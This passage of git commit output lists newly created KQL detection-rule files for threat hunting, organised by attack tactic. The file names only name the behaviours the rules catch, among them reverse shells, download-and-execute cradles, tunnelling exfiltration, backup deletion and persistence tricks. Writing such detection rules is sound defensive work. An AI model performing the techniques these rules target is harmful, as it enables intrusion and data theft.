KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql create mode 100644 KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/potential_winapi_calls_via_commandline.kql create mode 100644 KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql create mode 100644 KQL/rules/Execution/potential_xterm_reverse_shell.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql create mode 100644 KQL/rules/Execution/powershell_as_a_service_in_registry.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql create mode 100644 KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql create mode 100644 
KQL/rules/Execution/powershell_download_and_execution_cradles.kql create mode 100644 KQL/rules/Execution/powershell_download_pattern.kql create mode 100644 KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql create mode 100644 KQL/rules/Execution/powershell_inline_execution_from_a_file.kql create mode 100644 KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql create mode 100644 KQL/rules/Execution/powershell_script_execution_policy_enabled.kql create mode 100644 KQL/rules/Execution/powershell_script_run_in_appdata.kql create mode 100644 KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/psexec_execution.kql create mode 100644 KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql create mode 100644 KQL/rules/Execution/psexec_service_execution.kql create mode 100644 KQL/rules/Execution/psexec_service_file_creation.kql create mode 100644 KQL/rules/Execution/pua_advancedrun_execution.kql create mode 100644 KQL/rules/Execution/pua_nircmd_execution.kql create mode 100644 KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql create mode 100644 KQL/rules/Execution/pua_nsudo_execution.kql create mode 100644 KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql create mode 100644 KQL/rules/Execution/pua_runxcmd_execution.kql create mode 100644 KQL/rules/Execution/pua_wsudo_suspicious_execution.kql create mode 100644 KQL/rules/Execution/python_inline_command_execution.kql create mode 100644 KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql create mode 100644 KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql create mode 100644 KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql create mode 100644 KQL/rules/Execution/query_usage_to_exfil_data.kql create mode 100644 KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql create mode 100644 
KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql create mode 100644 KQL/rules/Execution/remcom_service_file_creation.kql create mode 100644 KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql create mode 100644 KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql create mode 100644 KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql create mode 100644 KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql create mode 100644 KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql create mode 100644 KQL/rules/Execution/renamed_curl_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_ftp_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_jusched_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_nircmd_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_pingcastle_binary_execution.kql create mode 100644 KQL/rules/Execution/renamed_psexec_service_execution.kql create mode 100644 KQL/rules/Execution/ruby_inline_command_execution.kql create mode 100644 KQL/rules/Execution/scheduled_cron_task_job_linux.kql create mode 100644 KQL/rules/Execution/scheduled_cron_task_job_macos.kql create mode 100644 KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql create mode 100644 KQL/rules/Execution/script_event_consumer_spawning_process.kql create mode 100644 KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql create mode 100644 KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql create mode 100644 KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql create mode 100644 KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql create mode 100644 
KQL/rules/Execution/shell_execution_via_git_linux.kql create mode 100644 KQL/rules/Execution/shell_execution_via_rsync_linux.kql create mode 100644 KQL/rules/Execution/shell_invocation_via_env_command_linux.kql create mode 100644 KQL/rules/Execution/shell_invocation_via_ssh_linux.kql create mode 100644 KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql create mode 100644 KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql create mode 100644 KQL/rules/Execution/start_windows_service_via_net_exe.kql create mode 100644 KQL/rules/Execution/successful_account_login_via_wmi.kql create mode 100644 KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql create mode 100644 KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql create mode 100644 KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql create mode 100644 KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql create mode 100644 KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql create mode 100644 KQL/rules/Execution/suspicious_electron_application_child_processes.kql create mode 100644 KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql create mode 100644 KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql create mode 100644 KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql create mode 100644 KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql create mode 100644 KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql create mode 100644 KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql create mode 100644 KQL/rules/Execution/suspicious_file_created_in_perflogs.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql create mode 100644 
KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql create mode 100644 KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql create mode 100644 KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql create mode 100644 KQL/rules/Execution/suspicious_installer_package_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql create mode 100644 KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql create mode 100644 KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql create mode 100644 KQL/rules/Execution/suspicious_java_children_processes.kql create mode 100644 KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql create mode 100644 KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql create mode 100644 KQL/rules/Execution/suspicious_nohup_execution.kql create mode 100644 KQL/rules/Execution/suspicious_outlook_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_parameter_substring.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_parent_process.kql create mode 100644 KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/suspicious_program_names.kql 
create mode 100644 KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql create mode 100644 KQL/rules/Execution/suspicious_runscripthelper_exe.kql create mode 100644 KQL/rules/Execution/suspicious_scan_loop_network.kql create mode 100644 KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql create mode 100644 KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql create mode 100644 KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql create mode 100644 KQL/rules/Execution/suspicious_spool_service_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql create mode 100644 KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql create mode 100644 KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql create mode 100644 KQL/rules/Execution/suspicious_wmiprvse_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql create mode 100644 KQL/rules/Execution/suspicious_zipexec_execution.kql create mode 100644 KQL/rules/Execution/sysprep_on_appdata_folder.kql create mode 100644 KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql create mode 100644 KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql create mode 100644 KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql create mode 100644 KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql create mode 100644 KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql create mode 100644 KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql create mode 100644 KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql create mode 100644 KQL/rules/Execution/use_of_fsharp_interpreters.kql create mode 100644 KQL/rules/Execution/use_of_openconsole.kql create mode 
100644 KQL/rules/Execution/use_of_pcalua_for_execution.kql create mode 100644 KQL/rules/Execution/vba_dll_loaded_via_office_application.kql create mode 100644 KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql create mode 100644 KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql create mode 100644 KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql create mode 100644 KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql create mode 100644 KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql create mode 100644 KQL/rules/Execution/wmic_remote_command_execution.kql create mode 100644 KQL/rules/Execution/wmiprvse_spawned_a_process.kql create mode 100644 KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql create mode 100644 KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql create mode 100644 KQL/rules/Execution/wscript_or_cscript_dropper_file.kql create mode 100644 KQL/rules/Execution/wscript_shell_run_in_commandline.kql create mode 100644 KQL/rules/Execution/wsl_child_process_anomaly.kql create mode 100644 KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql create mode 100644 KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql create mode 100644 KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql create mode 100644 KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql create mode 100644 KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql create mode 100644 KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql create mode 100644 KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql create mode 100644 
KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql create mode 100644 KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql create mode 100644 KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql create mode 100644 KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql create mode 100644 KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql create mode 100644 KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql create mode 100644 KQL/rules/Exfiltration/pua_rclone_execution.kql create mode 100644 KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql create mode 100644 KQL/rules/Exfiltration/python_webserver_execution_linux.kql create mode 100644 KQL/rules/Exfiltration/rclone_config_file_creation.kql create mode 100644 KQL/rules/Exfiltration/split_a_file_into_pieces.kql create mode 100644 KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql create mode 100644 KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql create mode 100644 KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql create mode 100644 KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql create mode 100644 KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql create mode 100644 KQL/rules/Exfiltration/tap_installer_execution.kql create mode 100644 KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql create mode 100644 
KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql create mode 100644 KQL/rules/Impact/backup_files_deleted.kql create mode 100644 KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql create mode 100644 KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql create mode 100644 KQL/rules/Impact/dd_file_overwrite.kql create mode 100644 KQL/rules/Impact/delete_all_scheduled_tasks.kql create mode 100644 KQL/rules/Impact/delete_important_scheduled_task.kql create mode 100644 KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql create mode 100644 KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql create mode 100644 KQL/rules/Impact/disable_important_scheduled_task.kql create mode 100644 KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql create mode 100644 KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql create mode 100644 KQL/rules/Impact/history_file_deletion.kql create mode 100644 KQL/rules/Impact/linux_crypto_mining_indicators.kql create mode 100644 KQL/rules/Impact/linux_crypto_mining_pool_connections.kql create mode 100644 KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql create mode 100644 KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql create mode 100644 KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql create mode 100644 KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql create mode 100644 KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql create mode 100644 KQL/rules/Impact/portable_gpg_exe_execution.kql create mode 100644 KQL/rules/Impact/potential_crypto_mining_activity.kql create mode 100644 KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql create mode 100644 KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql create mode 100644 KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql create mode 100644 
KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql create mode 100644 KQL/rules/Impact/registry_disable_system_restore.kql create mode 100644 KQL/rules/Impact/renamed_gpg_exe_execution.kql create mode 100644 KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql create mode 100644 KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql create mode 100644 KQL/rules/Impact/stop_windows_service_via_net_exe.kql create mode 100644 KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql create mode 100644 KQL/rules/Impact/stop_windows_service_via_sc_exe.kql create mode 100644 KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql create mode 100644 KQL/rules/Impact/suspicious_execution_of_shutdown.kql create mode 100644 KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql create mode 100644 KQL/rules/Impact/suspicious_macos_firmware_activity.kql create mode 100644 KQL/rules/Impact/suspicious_reg_add_bitlocker.kql create mode 100644 KQL/rules/Impact/system_shutdown_reboot_macos.kql create mode 100644 KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql create mode 100644 KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql create mode 100644 KQL/rules/Impact/user_has_been_deleted_via_userdel.kql create mode 100644 KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql create mode 100644 KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql create mode 100644 KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql create mode 100644 KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql create mode 100644 KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql create mode 100644 KQL/rules/Initial Access/octopus_scanner_malware.kql create mode 100644 KQL/rules/Initial Access/office_macro_file_creation.kql create mode 100644 KQL/rules/Initial 
Access/office_macro_file_creation_from_suspicious_process.kql create mode 100644 KQL/rules/Initial Access/office_macro_file_download.kql create mode 100644 KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql create mode 100644 KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql create mode 100644 KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql create mode 100644 KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql create mode 100644 KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql create mode 100644 KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql create mode 100644 KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql create mode 100644 KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql create mode 100644 KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql create mode 100644 KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql create mode 100644 KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql create mode 100644 KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql create mode 100644 KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql create mode 100644 KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql create mode 100644 KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql create mode 100644 KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql create mode 100644 KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql create mode 100644 KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql create mode 100644 KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql create mode 100644 KQL/rules/Initial Access/terminal_service_process_spawn.kql 
create mode 100644 KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql create mode 100644 KQL/rules/Initial Access/windows_registry_trust_record_modification.kql create mode 100644 KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql create mode 100644 KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql create mode 100644 KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql create mode 100644 KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql create mode 100644 KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql create mode 100644 KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql create mode 100644 KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql create mode 100644 KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql create mode 100644 KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql create mode 100644 KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql create mode 100644 KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql create mode 100644 KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql create mode 100644 KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql create mode 100644 KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql create mode 100644 KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql create mode 100644 KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql create mode 100644 KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql create mode 100644 KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql create mode 100644 KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql create mode 100644 
KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql create mode 100644 KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql create mode 100644 KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql create mode 100644 KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql create mode 100644 KQL/rules/Lateral Movement/winrs_local_command_execution.kql create mode 100644 KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql create mode 100644 KQL/rules/Lateral Movement/wmiexec_default_output_file.kql create mode 100644 KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql create mode 100644 KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql create mode 100644 KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql create mode 100644 KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql create mode 100644 KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql create mode 100644 KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql create mode 100644 KQL/rules/Persistence/change_the_fax_dll.kql create mode 100644 KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql create mode 100644 KQL/rules/Persistence/chopper_webshell_process_pattern.kql create mode 100644 KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql create mode 100644 KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql create mode 100644 KQL/rules/Persistence/com_hijack_via_sdclt.kql create mode 100644 KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql create mode 
100644 KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql create mode 100644 KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql create mode 100644 KQL/rules/Persistence/creation_of_a_local_user_account.kql create mode 100644 KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql create mode 100644 KQL/rules/Persistence/disable_windows_security_center_notifications.kql create mode 100644 KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql create mode 100644 KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql create mode 100644 KQL/rules/Persistence/dropping_of_password_filter_dll.kql create mode 100644 KQL/rules/Persistence/enable_lm_hash_storage.kql create mode 100644 KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql create mode 100644 KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql create mode 100644 KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql create mode 100644 KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql create mode 100644 KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql create mode 100644 KQL/rules/Persistence/etw_logging_disabled_for_scm.kql create mode 100644 KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql create mode 100644 KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql create mode 100644 KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql create mode 100644 KQL/rules/Persistence/ie_change_domain_zone.kql create mode 100644 KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql create mode 100644 KQL/rules/Persistence/imports_registry_key_from_a_file.kql create mode 100644 KQL/rules/Persistence/imports_registry_key_from_an_ads.kql create mode 100644 KQL/rules/Persistence/interactive_at_job.kql create mode 100644 KQL/rules/Persistence/linux_webshell_indicators.kql create mode 100644 
KQL/rules/Persistence/macos_emond_launch_daemon.kql create mode 100644 KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql create mode 100644 KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql create mode 100644 KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql create mode 100644 KQL/rules/Persistence/modification_of_ie_registry_settings.kql create mode 100644 KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql create mode 100644 KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql create mode 100644 KQL/rules/Persistence/msexchange_transport_agent_installation.kql create mode 100644 KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql create mode 100644 KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql create mode 100644 KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql create mode 100644 KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql create mode 100644 KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql create mode 100644 KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql create mode 100644 KQL/rules/Persistence/new_odbc_driver_registered.kql create mode 100644 KQL/rules/Persistence/new_service_creation_using_powershell.kql create mode 100644 KQL/rules/Persistence/new_service_creation_using_sc_exe.kql create mode 100644 KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql create mode 100644 KQL/rules/Persistence/new_user_created_via_net_exe.kql create mode 100644 KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql create mode 100644 KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql create mode 100644 KQL/rules/Persistence/office_application_startup_office_test.kql create mode 100644 KQL/rules/Persistence/office_macros_warning_disabled.kql create mode 100644 
KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql create mode 100644 KQL/rules/Persistence/outlook_security_settings_updated_registry.kql create mode 100644 KQL/rules/Persistence/path_to_screensaver_binary_modified.kql create mode 100644 KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql create mode 100644 KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql create mode 100644 KQL/rules/Persistence/persistence_via_new_sip_provider.kql create mode 100644 KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql create mode 100644 KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql create mode 100644 KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql create mode 100644 KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql create mode 100644 KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql create mode 100644 KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql create mode 100644 KQL/rules/Persistence/potential_eacore_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_edputil_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_autodialdll.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql create mode 100644 
KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_mpnotify.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_outlook_form.kql create mode 100644 